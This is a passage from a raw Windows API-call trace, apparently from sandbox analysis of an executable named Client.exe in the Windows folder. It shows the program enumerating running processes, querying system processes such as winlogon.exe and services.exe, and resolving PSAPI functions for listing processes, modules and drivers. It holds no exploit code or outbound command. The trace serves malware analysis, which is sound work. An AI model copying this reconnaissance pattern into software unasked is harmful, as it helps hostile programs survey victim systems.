lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0289.438] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x168) returned 0x0 [0289.439] CloseHandle (hObject=0x170) returned 1 [0289.439] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 0 [0289.439] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 0 [0289.439] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 0 [0289.439] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1a4) returned 0x170 [0289.439] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\winlogon.exe", lpdwSize=0x18fd48) returned 1 [0289.441] CloseHandle (hObject=0x170) returned 1 [0289.441] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\winlogon.exe", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0289.441] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\winlogon.exe", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0289.441] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\winlogon.exe", cchWideChar=32, lpMultiByteStr=0x9e0838, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\winlogon.exe", lpUsedDefaultChar=0x0) returned 32 [0289.441] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1a4) returned 0x170 [0289.441] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb36, lpdwSize=0x18fd40 | out: lpExeName="C:\\Windows\\System32\\winlogon.exe", lpdwSize=0x18fd40) returned 1 [0289.444] CloseHandle (hObject=0x170) returned 1 [0289.444] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1a4) returned 0x170 [0289.444] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\winlogon.exe", lpdwSize=0x18fd48) returned 1 [0289.446] CloseHandle (hObject=0x170) returned 1 [0289.446] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1a4) returned 0x170 [0289.446] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\winlogon.exe", lpdwSize=0x18fd48) returned 1 [0289.449] CloseHandle (hObject=0x170) returned 1 [0289.449] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fb2c, nSize=0x105 | out: lpFilename="C:\\Windows\\Client.exe" (normalized: "c:\\windows\\client.exe")) returned 0x15 [0289.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c8) returned 0x170 [0289.449] GetPriorityClass (hProcess=0x170) returned 0x20 [0289.449] CloseHandle (hObject=0x170) returned 1 [0289.449] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1c8) returned 0x170 [0289.449] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3a, lpdwSize=0x18fd44 | out: lpExeName="C:\\Windows\\System32\\services.exe", lpdwSize=0x18fd44) returned 1 [0289.716] CloseHandle (hObject=0x170) returned 1 [0289.716] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x170 [0289.720] Process32FirstW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.720] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0289.721] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0289.722] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0289.722] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0289.723] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0289.724] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0289.724] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0289.725] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x170) returned 0x178 [0289.725] LoadLibraryW (lpLibFileName="PSAPI.dll") returned 0x779b0000 [0289.726] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="EnumProcesses", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0289.727] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="EnumProcesses", cchWideChar=13, lpMultiByteStr=0x9c4a4c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EnumProcesses", lpUsedDefaultChar=0x0) returned 13 [0289.727] GetProcAddress (hModule=0x779b0000, lpProcName="EnumProcesses") returned 0x779b1544 [0289.727] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="EnumProcessModules", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0289.727] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="EnumProcessModules", cchWideChar=18, lpMultiByteStr=0x9d92ac, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EnumProcessModules", lpUsedDefaultChar=0x0) returned 18 [0289.727] GetProcAddress (hModule=0x779b0000, lpProcName="EnumProcessModules") returned 0x779b1408 [0289.727] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetModuleBaseNameW", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0289.727] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetModuleBaseNameW", cchWideChar=18, lpMultiByteStr=0x9d92ac, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetModuleBaseNameW", lpUsedDefaultChar=0x0) returned 18 [0289.727] GetProcAddress (hModule=0x779b0000, lpProcName="GetModuleBaseNameW") returned 0x779b152c [0289.727] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetModuleFileNameExW", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0289.727] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetModuleFileNameExW", cchWideChar=20, lpMultiByteStr=0x9d92ac, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetModuleFileNameExW", lpUsedDefaultChar=0x0) returned 20 [0289.727] GetProcAddress (hModule=0x779b0000, lpProcName="GetModuleFileNameExW") returned 0x779b13f0 [0289.727] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetModuleBaseNameA", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0289.727] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetModuleBaseNameA", cchWideChar=18, lpMultiByteStr=0x9d92ac, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetModuleBaseNameA", lpUsedDefaultChar=0x0) returned 18 [0289.727] GetProcAddress (hModule=0x779b0000, lpProcName="GetModuleBaseNameA") returned 0x779b15a4 [0289.727] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetModuleFileNameExA", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0289.727] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetModuleFileNameExA", cchWideChar=20, lpMultiByteStr=0x9d92ac, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetModuleFileNameExA", lpUsedDefaultChar=0x0) returned 20 [0289.727] GetProcAddress (hModule=0x779b0000, lpProcName="GetModuleFileNameExA") returned 0x779b15bc [0289.728] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetModuleBaseNameW", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0289.728] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetModuleBaseNameW", cchWideChar=18, lpMultiByteStr=0x9d92ac, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetModuleBaseNameW", lpUsedDefaultChar=0x0) returned 18 [0289.728] GetProcAddress (hModule=0x779b0000, lpProcName="GetModuleBaseNameW") returned 0x779b152c [0289.728] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetModuleFileNameExW", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0289.728] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetModuleFileNameExW", cchWideChar=20, lpMultiByteStr=0x9d92ac, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetModuleFileNameExW", lpUsedDefaultChar=0x0) returned 20 [0289.728] GetProcAddress (hModule=0x779b0000, lpProcName="GetModuleFileNameExW") returned 0x779b13f0 [0289.728] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetModuleInformation", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0289.728] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetModuleInformation", cchWideChar=20, lpMultiByteStr=0x9d92ac, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetModuleInformation", lpUsedDefaultChar=0x0) returned 20 [0289.728] GetProcAddress (hModule=0x779b0000, lpProcName="GetModuleInformation") returned 0x779b1420 [0289.728] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="EmptyWorkingSet", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0289.728] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="EmptyWorkingSet", cchWideChar=15, lpMultiByteStr=0x9c4a4c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EmptyWorkingSet", lpUsedDefaultChar=0x0) returned 15 [0289.728] GetProcAddress (hModule=0x779b0000, lpProcName="EmptyWorkingSet") returned 0x779b15ee [0289.728] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="QueryWorkingSet", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0289.728] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="QueryWorkingSet", cchWideChar=15, lpMultiByteStr=0x9c4a4c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QueryWorkingSet", lpUsedDefaultChar=0x0) returned 15 [0289.728] GetProcAddress (hModule=0x779b0000, lpProcName="QueryWorkingSet") returned 0x779b158c [0289.728] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeProcessForWsWatch", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0289.728] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeProcessForWsWatch", cchWideChar=27, lpMultiByteStr=0x9e089c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InitializeProcessForWsWatch", lpUsedDefaultChar=0x0) returned 27 [0289.729] GetProcAddress (hModule=0x779b0000, lpProcName="InitializeProcessForWsWatch") returned 0x779b15fe [0289.729] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetMappedFileNameW", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0289.729] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetMappedFileNameW", cchWideChar=18, lpMultiByteStr=0x9d92ac, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetMappedFileNameW", lpUsedDefaultChar=0x0) returned 18 [0289.729] GetProcAddress (hModule=0x779b0000, lpProcName="GetMappedFileNameW") returned 0x779b162e [0289.729] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDeviceDriverBaseNameW", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0289.729] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDeviceDriverBaseNameW", cchWideChar=24, lpMultiByteStr=0x9e089c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetDeviceDriverBaseNameW", lpUsedDefaultChar=0x0) returned 24 [0289.729] GetProcAddress (hModule=0x779b0000, lpProcName="GetDeviceDriverBaseNameW") returned 0x779b1514 [0289.729] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDeviceDriverFileNameW", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0289.729] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDeviceDriverFileNameW", cchWideChar=24, lpMultiByteStr=0x9e089c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetDeviceDriverFileNameW", lpUsedDefaultChar=0x0) returned 24 [0289.729] GetProcAddress (hModule=0x779b0000, lpProcName="GetDeviceDriverFileNameW") returned 0x779b165e [0289.729] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetMappedFileNameA", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0289.729] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetMappedFileNameA", cchWideChar=18, lpMultiByteStr=0x9d92ac, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetMappedFileNameA", lpUsedDefaultChar=0x0) returned 18 [0289.729] GetProcAddress (hModule=0x779b0000, lpProcName="GetMappedFileNameA") returned 0x779b163e [0289.729] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDeviceDriverBaseNameA", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0289.729] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDeviceDriverBaseNameA", cchWideChar=24, lpMultiByteStr=0x9e089c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetDeviceDriverBaseNameA", lpUsedDefaultChar=0x0) returned 24 [0289.729] GetProcAddress (hModule=0x779b0000, lpProcName="GetDeviceDriverBaseNameA") returned 0x779b14e4 [0289.729] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDeviceDriverFileNameA", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0289.729] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDeviceDriverFileNameA", cchWideChar=24, lpMultiByteStr=0x9e089c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetDeviceDriverFileNameA", lpUsedDefaultChar=0x0) returned 24 [0289.730] GetProcAddress (hModule=0x779b0000, lpProcName="GetDeviceDriverFileNameA") returned 0x779b164e [0289.730] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetMappedFileNameW", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0289.730] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetMappedFileNameW", cchWideChar=18, lpMultiByteStr=0x9d92ac, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetMappedFileNameW", lpUsedDefaultChar=0x0) returned 18 [0289.730] GetProcAddress (hModule=0x779b0000, lpProcName="GetMappedFileNameW") returned 0x779b162e [0289.730] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDeviceDriverBaseNameW", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0289.730] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDeviceDriverBaseNameW", cchWideChar=24, lpMultiByteStr=0x9e089c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetDeviceDriverBaseNameW", lpUsedDefaultChar=0x0) returned 24 [0289.730] GetProcAddress (hModule=0x779b0000, lpProcName="GetDeviceDriverBaseNameW") returned 0x779b1514 [0289.730] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDeviceDriverFileNameW", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0289.730] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDeviceDriverFileNameW", cchWideChar=24, lpMultiByteStr=0x9e089c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetDeviceDriverFileNameW", lpUsedDefaultChar=0x0) returned 24 [0289.730] GetProcAddress (hModule=0x779b0000, lpProcName="GetDeviceDriverFileNameW") returned 0x779b165e [0289.730] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="EnumDeviceDrivers", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0289.730] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="EnumDeviceDrivers", cchWideChar=17, lpMultiByteStr=0x9d92ac, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EnumDeviceDrivers", lpUsedDefaultChar=0x0) returned 17 [0289.730] GetProcAddress (hModule=0x779b0000, lpProcName="EnumDeviceDrivers") returned 0x779b14cc [0289.730] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetProcessMemoryInfo", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0289.731] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetProcessMemoryInfo", cchWideChar=20, lpMultiByteStr=0x9d92ac, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetProcessMemoryInfo", lpUsedDefaultChar=0x0) returned 20 [0289.731] GetProcAddress (hModule=0x779b0000, lpProcName="GetProcessMemoryInfo") returned 0x779b155c [0289.731] GetModuleFileNameExW (in: hProcess=0x178, hModule=0x0, lpFilename=0x9110b0, nSize=0x104 | out: lpFilename="\x01" (normalized: "c:\\windows\\syswow64\\\x01")) returned 0x0 [0289.731] CloseHandle (hObject=0x178) returned 1 [0289.731] CloseHandle (hObject=0x170) returned 1 [0289.731] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x170) returned 0x170 [0289.731] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18f8e6, lpdwSize=0x18faf0 | out: lpExeName="C:\\Windows\\System32\\wininit.exe", lpdwSize=0x18faf0) returned 1 [0289.733] CloseHandle (hObject=0x170) returned 1 [0289.733] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\wininit.exe", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0289.733] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\wininit.exe", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0289.733] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\wininit.exe", cchWideChar=31, lpMultiByteStr=0x9e0898, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\wininit.exe", lpUsedDefaultChar=0x0) returned 31 [0289.733] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1c8) returned 0x170 [0289.733] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\services.exe", lpdwSize=0x18fd48) returned 1 [0289.735] CloseHandle (hObject=0x170) returned 1 [0289.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\services.exe", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0289.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\services.exe", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0289.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\services.exe", cchWideChar=32, lpMultiByteStr=0x9e0898, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\services.exe", lpUsedDefaultChar=0x0) returned 32 [0289.735] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1c8) returned 0x170 [0289.735] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb36, lpdwSize=0x18fd40 | out: lpExeName="C:\\Windows\\System32\\services.exe", lpdwSize=0x18fd40) returned 1 [0289.737] CloseHandle (hObject=0x170) returned 1 [0289.737] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1c8) returned 0x170 [0289.738] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\services.exe", lpdwSize=0x18fd48) returned 1 [0289.740] CloseHandle (hObject=0x170) returned 1 [0289.740] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1c8) returned 0x170 [0289.740] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, 